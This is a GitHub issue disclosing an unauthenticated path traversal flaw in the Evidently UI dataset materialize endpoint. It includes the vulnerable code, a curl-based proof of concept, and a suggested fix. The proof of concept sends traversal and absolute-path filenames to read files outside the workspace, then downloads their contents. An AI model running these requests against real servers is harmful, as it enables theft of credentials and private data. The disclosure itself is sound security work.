Skip to content

Unauthenticated path traversal arbitrary file read in Evidently UI dataset materialization #1887

@geo-chen

Description

@geo-chen

Summary

The Evidently UI service exposes a dataset "materialize from source" endpoint that accepts a fully attacker-controlled filename and passes it, without any containment check, into the local blob storage which reads it with posixpath.join(base_path, filename). Because posixpath.join honors both ../ segments and absolute paths, an attacker can read any .csv or .parquet file on the host filesystem (outside the workspace directory) and then download its contents through the dataset download endpoint.

In the default configuration (evidently ui, started without a secret), the service runs with NoSecurityComponent, so every endpoint is unauthenticated. The result is unauthenticated arbitrary file read over the network.

Affected Versions

Confirmed on v0.7.21 (latest release). The vulnerable code path is present in the evidently.ui.service package.

Details

The endpoint POST /api/datasets/materialize (src/evidently/ui/service/api/datasets.py) builds a data source from the request body and materializes it:

@post("/materialize")
async def materialize_from_source(
    data: MaterializeDatasetRequest,
    dataset_manager: ...,
    user_id: UserID,
    project_id: ProjectID,
) -> MaterializeDatasetResponse:
    df = await data.source.to_data_source(user_id=user_id, project_id=project_id).materialize(dataset_manager)
    dataset = await dataset_manager.upload_dataset(...)  # stores df as a new dataset you can download
    return MaterializeDatasetResponse(dataset_id=dataset.id)

When the source is a FileDataSource (src/evidently/ui/service/datasets/data_source.py), filename is taken verbatim from the request:

class FileDataSource(SortedFilteredDataSource):
    project_id: ProjectID
    filename: str
    is_tmp: bool = False

    def read(self, storage):
        df = FileIO(storage).read_file_from_storage(self.project_id, self.filename)
        return df

FileIO.read_file_from_storage (src/evidently/ui/service/datasets/file_io.py) only validates the file extension, then reads the path as a blob id:

def read_file_from_storage(self, project_id, file_id):
    _, file_extension = os.path.splitext(file_id)
    if file_extension not in self.ALLOWED_FILE_READERS.keys():  # .csv / .parquet only
        raise HTTPException(status_code=400, detail="Extension not allowed")
    file_content = self.file_storage.get_dataset(file_id)   # file_id == attacker filename
    ...

DatasetFileStorage.get_dataset(blob_id) -> BlobStorage.get_blob_data(blob_id) -> FSSpecBlobStorage.open_blob -> FSLocation.open (src/evidently/ui/service/storage/fslocation.py):

@contextlib.contextmanager
def open(self, path: str, mode="r"):
    with self.fs.open(posixpath.join(self.path, path), mode) as f:
        yield f

There is no normalization or base-directory containment. posixpath.join("workspace", "../../../../etc/x.csv") escapes the workspace, and posixpath.join("workspace", "/tmp/x.csv") discards the base entirely and reads the absolute path.

The materialized rows are then stored as a normal dataset and can be retrieved verbatim through the unauthenticated read routes GET /api/datasets/{id}/download and GET /api/datasets/{id}.

The only restriction is the extension allowlist (.csv, .parquet). These formats commonly contain database dumps, credential exports, model training data, and PII on the same host.

Proof of Concept

Prerequisites:

  • pip install evidently==0.7.21
  • A sensitive .csv file existing outside the workspace, simulating any data export / credential file on the host.

Steps:

  1. Create a sensitive file outside the workspace:
printf 'secret_col,value\nADMIN_DB_PASSWORD,hunter2_supersecret\n' > /tmp/secret_outside.csv
  1. Start the Evidently UI with its default configuration (no secret = no authentication):
mkdir -p /tmp/ev_run/workspace
cd /tmp/ev_run
python -c "from evidently.ui.service.app import run_local; run_local(host='127.0.0.1', port=8011, workspace='/tmp/ev_run/workspace')"
  1. Create a project (unauthenticated):
curl -s -X POST http://127.0.0.1:8011/api/projects \
  -H 'Content-Type: application/json' \
  -d '{"name":"poc","description":"x"}'

Output:

"019ecac5-bf25-7a67-85ab-b2071b844ca1"
  1. Materialize a dataset from a traversal filename (PROJECT_ID from step 3):
curl -s -X POST "http://127.0.0.1:8011/api/datasets/materialize?project_id=019ecac5-bf25-7a67-85ab-b2071b844ca1" \
  -H 'Content-Type: application/json' \
  -d '{
        "name": "stolen",
        "source": {
          "type": "evidently:data_source_dto:FileDataSourceDTO",
          "filename": "../../../../../../tmp/secret_outside.csv"
        }
      }'

Output:

{"dataset_id":"019ecac6-2ade-776e-bf50-a6ae18a25521"}
  1. Download the stolen file contents:
curl -s "http://127.0.0.1:8011/api/datasets/019ecac6-2ade-776e-bf50-a6ae18a25521/download?format=csv"

Output (contents of /tmp/secret_outside.csv, which lives outside the workspace):

secret_col,value
ADMIN_DB_PASSWORD,hunter2_supersecret

An absolute path works identically (the join discards the workspace base):

printf 'k,v\nABSOLUTE_READ,works\n' > /tmp/abs_secret.csv
curl -s -X POST "http://127.0.0.1:8011/api/datasets/materialize?project_id=019ecac5-bf25-7a67-85ab-b2071b844ca1" \
  -H 'Content-Type: application/json' \
  -d '{"name":"abs","source":{"type":"evidently:data_source_dto:FileDataSourceDTO","filename":"/tmp/abs_secret.csv"}}'
# -> {"dataset_id":"019ecac6-686e-7e6d-9afe-23697614e585"}
curl -s "http://127.0.0.1:8011/api/datasets/019ecac6-686e-7e6d-9afe-23697614e585/download?format=csv"
# -> k,v
#    ABSOLUTE_READ,works

Impact

An unauthenticated remote attacker (or, when a token is configured, any authenticated user) can read arbitrary .csv and .parquet files anywhere on the server filesystem and exfiltrate their full contents. This discloses database exports, credential/secret files, training datasets, and other tenant data stored on the host, regardless of the project the attacker can access.

Suggested Remediation

Resolve and contain the requested path before opening it. For example, in FSLocation.open (and the other path-taking methods) reject absolute paths and normalize/verify the result stays under self.path:

def _safe(self, path: str) -> str:
    full = posixpath.normpath(posixpath.join(self.path, path))
    base = posixpath.normpath(self.path)
    if full != base and not full.startswith(base + posixpath.sep):
        raise PermissionError("path escapes storage root")
    return full

Additionally, in read_file_from_storage / FileDataSource, validate that filename contains no path separators or .. segments, and resolve dataset files only by their stored blob id rather than a client-supplied path.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions